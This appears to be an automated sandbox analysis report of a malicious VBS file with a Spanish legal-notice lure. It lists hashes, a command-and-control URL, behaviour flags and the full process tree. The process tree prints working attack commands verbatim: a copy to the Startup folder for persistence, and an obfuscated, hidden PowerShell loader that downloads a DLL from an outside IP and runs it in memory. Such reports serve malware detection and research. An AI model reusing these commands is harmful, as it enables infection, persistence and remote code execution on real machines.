Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-01-2022 17:37
Static task
static1
Behavioral task
behavioral1
Sample
Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
Resource
win7-en-20211208
General
-
Target
Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
-
Size
151KB
-
MD5
375043101c2b371e5db90b0abdb0379d
-
SHA1
8ca125b715a2f166ae8d24c87264f9beb4ddda6b
-
SHA256
fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9
-
SHA512
582ad71b82c9fd666a5c26738264aded5d226e1a2417f30e55f4b258c3c111caf18b15dcf9d0ffb48c1fa96a996a845cd9e64357925b0f29939252085d6ff416
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1148 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 640 powershell.exe 1156 powershell.exe 1148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 1068 wrote to memory of 464 1068 WScript.exe cmd.exe PID 1068 wrote to memory of 464 1068 WScript.exe cmd.exe PID 1068 wrote to memory of 464 1068 WScript.exe cmd.exe PID 464 wrote to memory of 384 464 cmd.exe PING.EXE PID 464 wrote to memory of 384 464 cmd.exe PING.EXE PID 464 wrote to memory of 384 464 cmd.exe PING.EXE PID 464 wrote to memory of 640 464 cmd.exe powershell.exe PID 464 wrote to memory of 640 464 cmd.exe powershell.exe PID 464 wrote to memory of 640 464 cmd.exe powershell.exe PID 1068 wrote to memory of 1156 1068 WScript.exe powershell.exe PID 1068 wrote to memory of 1156 1068 WScript.exe powershell.exe PID 1068 wrote to memory of 1156 1068 WScript.exe powershell.exe PID 1156 wrote to memory of 1148 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 1148 1156 powershell.exe powershell.exe PID 1156 wrote to memory of 1148 1156 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')2⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5d89aca5f4591e1e46e82f7d1d8fbceae
SHA18b454e6f4ebea813b4f41d23b257b493cdc9c3c0
SHA25650c2b1115020547d9e96e69607c3d2352730f0675eb20ade7e39f1a091302ad2
SHA51214e662f67fc2f22435d64b110d63d8d741566cc197a80b1acb29e16390af240061461b03332f6eeb9b30fef6aacf6d9574729d5aa6d0ae391b2f926dfdfccfc5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5d89aca5f4591e1e46e82f7d1d8fbceae
SHA18b454e6f4ebea813b4f41d23b257b493cdc9c3c0
SHA25650c2b1115020547d9e96e69607c3d2352730f0675eb20ade7e39f1a091302ad2
SHA51214e662f67fc2f22435d64b110d63d8d741566cc197a80b1acb29e16390af240061461b03332f6eeb9b30fef6aacf6d9574729d5aa6d0ae391b2f926dfdfccfc5